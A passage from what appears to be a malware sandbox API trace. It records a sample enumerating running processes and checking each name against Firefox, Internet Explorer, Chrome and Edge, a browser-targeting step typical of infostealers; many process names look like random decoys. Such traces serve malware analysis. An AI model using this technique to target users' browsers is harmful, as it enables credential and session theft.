hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.341] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.341] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.341] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.341] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.341] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0210.342] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0210.342] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0210.342] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0210.342] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.342] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.342] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.342] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.342] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.342] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.342] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.343] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.343] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.343] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.343] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.343] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.343] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0210.343] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0210.343] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0210.343] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.344] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0210.344] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0210.344] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0210.344] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0210.344] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.344] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0210.345] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0210.345] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0210.345] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0210.345] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.345] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.345] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.345] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.345] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.345] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.345] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0210.346] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0210.346] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0210.346] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0210.346] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.346] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0210.346] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0210.346] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0210.346] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0210.346] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.346] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0210.347] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0210.347] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0210.347] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0210.347] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.347] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0210.347] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0210.347] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0210.347] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0210.348] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.348] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0210.348] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0210.348] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0210.348] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0210.348] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.348] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0210.349] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0210.349] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0210.349] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0210.349] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.349] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0210.349] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0210.349] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0210.349] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0210.349] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.349] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0210.350] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0210.350] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0210.350] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0210.350] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.350] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0210.350] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0210.350] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0210.350] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0210.350] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.350] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0210.351] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0210.351] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0210.351] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0210.351] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.351] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0210.351] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0210.351] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0210.351] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0210.352] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.352] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0210.352] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0210.352] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0210.352] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0210.352] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.352] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0210.353] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0210.353] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0210.353] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0210.353] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.353] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0210.353] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0210.353] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0210.353] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0210.353] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.353] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0210.354] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0210.354] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0210.354] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0210.354] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.354] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0210.354] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0210.354] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0210.354] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0210.354] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.354] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0210.355] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0210.355] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0210.355] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0210.355] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.355] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0210.356] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0210.356] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0210.356] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0210.356] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.356] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0210.356] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0210.356] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0210.356] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0210.356] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.356] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0210.357] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0210.357] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0210.357] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0210.357] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.357] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0210.357] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0210.357] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0210.357] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0210.357] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.357] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0210.358] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0210.358] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0210.358] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0210.358] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.358] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.358] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0210.358] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0210.358] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0210.359] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.359] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.359] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.359] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.359] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.359] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.359] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0210.360] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0210.360] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0210.360] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0210.360] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.360] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.360] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.360] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.360] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.360] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.360] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0210.361] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0210.361] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0210.361] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0210.361] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.361] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.361] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.361] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.361] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.361] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.361] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.362] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0210.362] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0210.362] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0210.362] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.362] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0210.363] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0210.363] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0210.363] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0210.363] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.363] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.442] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0210.442] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0210.442] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0210.442] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.442] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.442] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0210.442] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0210.442] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0210.442] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.442] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, 